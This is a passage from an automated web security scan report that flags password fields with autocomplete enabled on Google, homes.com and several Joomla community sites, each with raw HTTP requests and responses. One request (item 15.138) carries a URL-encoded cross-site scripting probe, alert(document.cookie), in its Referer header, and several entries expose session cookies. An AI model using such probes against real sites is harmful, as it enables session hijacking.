Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=UyGwfUaxON0;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:45:03 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10829
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

15.124. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.heroturko.org
Path:   /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The page contains a form with the following action URL:
  • http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22
The form contains the following password field with autocomplete enabled:
  • login_password

Request

GET /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 HTTP/1.1
Host: www.heroturko.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...
<div style="overflow: hidden; margin-bottom: 25px; padding-right: 15px;">
<form id="loginform" method="post" onsubmit="javascript:showBusyLayer()" action=''>

<input id="modlgn_username" type="text" name="login_name" class="inputbox" alt="username" size="18" onblur="if(this.value=='') this.value='username';" onfocus="if(this.value=='username')
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="login_password" class="inputbox" size="18" alt="password" onblur="if(this.value=='') this.value='password';" onfocus="if(this.value=='password') this.value='';" value="password" />

<div align="right">
...[SNIP]...

15.125. http://www.homes.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.homes.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.homes.com/
The form contains the following password field with autocomplete enabled:
  • password

Request

GET / HTTP/1.1
Host: www.homes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:46:20 GMT
Set-Cookie: CFID=60949328;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: CFTOKEN=33627566;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;domain=homes.com;expires=Tue, 25-Jan-2011 23:46:20 GMT;path=/
Set-Cookie: IS_MOBILE=false;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D60949328%26CFTOKEN%23%3D33627566%23lastvisit%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D24%2018%3A46%3A20%27%7D%23hitcount%3D2%23cftoken%3D33627566%23cfid%3D60949328%23;expires=Wed, 16-Jan-2041 23:46:20 GMT;path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS4d7797=e908a900d531093072d6317c62f2667deb209ca39e7db0094d3e16c81399c6ee753c24c91beeb5004578232ed38192d33f299dc0d38192d33f299dc057e19d31bf3d0887; Path=/
Content-Length: 32451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Homes.com - Ho
...[SNIP]...
</div>
   <form method="post" onsubmit="return false;">
<fieldset id="myHomesLoginForm" class="popupForm">
...[SNIP]...
</label>
       <input class="text" type="password" name="password" id="password" size="46" maxlength="112" value="" />
   </div>
...[SNIP]...

15.126. http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.id-joomla.com
Path:   /berita-joomla/648-joomla-16-telah-datang

Issue detail

The page contains a form with the following action URL:
  • http://www.id-joomla.com/component/comprofiler/login
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /berita-joomla/648-joomla-16-telah-datang HTTP/1.1
Host: www.id-joomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:45:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: 49291818acdf6a0853370bd89db83d1e=s0aevrt4jrilpgl4pva0tih570; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:45:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45105

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<div class="moduletable_inner"><form action="http://www.id-joomla.com/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

15.127. http://www.joomla.org/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.joomla.org
Path:   /login.html

Issue detail

The page contains a form with the following action URL:
  • http://www.joomla.org/login.html
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /login.html HTTP/1.1
Host: www.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.5.10.1295835652; 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
</div>
<form action="/login.html" method="post" name="com-login" id="com-form-login">
<table width="100%" border="0" align="center" cellpadding="4" cellspacing="0" class="contentpane">
...[SNIP]...
<br />
       <input type="password" id="passwd" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

15.128. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.joomla.org.tw
Path:   /news/joomla-official-news/163-joomla16-arrived

Issue detail

The page contains a form with the following action URL:
  • http://www.joomla.org.tw/component/comprofiler/login
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /news/joomla-official-news/163-joomla16-arrived HTTP/1.1
Host: www.joomla.org.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a798c6463d2f54ee9d166568119e0c09=806uqp0b11fh0lrh0emunokum3; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-tw" lang="zh-tw" dir="
...[SNIP]...
<div class="module"><form action="http://www.joomla.org.tw/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

15.129. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.joomlacommunity.eu
Path:   /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The page contains a form with the following action URL:
  • http://www.joomlacommunity.eu/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html HTTP/1.1
Host: www.joomlacommunity.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
</h3>
                   

<form action="http://www.joomlacommunity.eu/index.php" method="post" name="login" id="form-login" >
           <label for="modlgn_username">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
           <label for="modlgn_remember">
...[SNIP]...

15.130. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.joomlacorner.com
Path:   /joomla-news/608-joomla-16-has-arrived.html

Issue detail

The page contains a form with the following action URL:
  • http://www.joomlacorner.com/joomla-news/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /joomla-news/608-joomla-16-has-arrived.html HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=4a98f8c53f4541210928f4c67e558242; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:02 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
<div class="ja-box-ct clearfix">
       <form action="index.php" method="post" name="form-login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
       </label>
...[SNIP]...

15.131. http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.joomlainorge.no
Path:   /nyheter/joomla/552-joomlar-16-er-utgitt

Issue detail

The page contains a form with the following action URL:
  • https://www.joomlainorge.no/nyheter/joomla
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET /nyheter/joomla/552-joomlar-16-er-utgitt HTTP/1.1
Host: www.joomlainorge.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 536a515975b0bb224c84dbf364570dc5=d25c0652ad8dc304e171cefb60e2e9c9; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nb-no" lang="nb-no" dir=
...[SNIP]...
<div class="module mod-blank first last">

   
           <form action="https://www.joomlainorge.no/nyheter/joomla" method="post" name="login">

<span class="quick" style="display: block;">
...[SNIP]...
<span class="password">
           
               <input type="password" name="passwd" size="10" alt="Passord" value="Passord" onblur="if(this.value=='') this.value='Passord';" onfocus="if(this.value=='Passord') this.value='';" />
               
           </span>
...[SNIP]...

15.132. http://www.linkagogo.com/go/AddNoPopup

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The page contains a form with the following action URL:
  • http://www.linkagogo.com/go/AddNoPopup
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27elZo"
Last-Modified: Tue, 25 Jan 2011 04:41:53 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<form name=urlEdit method="post" action="/go/AddNoPopup">
<input type="hidden" name="target" value="null">
...[SNIP]...
<td>
<input type="password" name="password" value="" size="8">
</td>
...[SNIP]...

15.133. http://www.lithuanianjoomla.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/index.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET / HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.134. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /7-joomla-naujienos/70-joomla-160-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:25 GMT
Server: Apache
Set-Cookie: 2d3002958ebe475c6a8e5c841c44742a=ab02d207ed15eb2c3afc574ced1efe67; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.135. http://www.lithuanianjoomla.com/apie-joomla.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /apie-joomla.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/apie-joomla.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /apie-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:04 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/apie-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.136. http://www.lithuanianjoomla.com/component/users/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /component/users/

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/component/users/
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /component/users/ HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/component/users/" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.137. http://www.lithuanianjoomla.com/component/users/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /component/users/

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/component/users/?task=user.login
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /component/users/ HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<div class="login">
   
   
                       <form action="/component/users/?task=user.login" method="post">

       <fieldset>
...[SNIP]...
</label>                    <input type="password" name="password" id="password" value="" class="validate-password required" size="25"/></div>
...[SNIP]...

15.138. http://www.lithuanianjoomla.com/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/index.php
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /index.php HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:16:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 21848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.139. http://www.lithuanianjoomla.com/joomla-naujienos.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.140. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Issue detail

The page contains a form with the following action URL:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
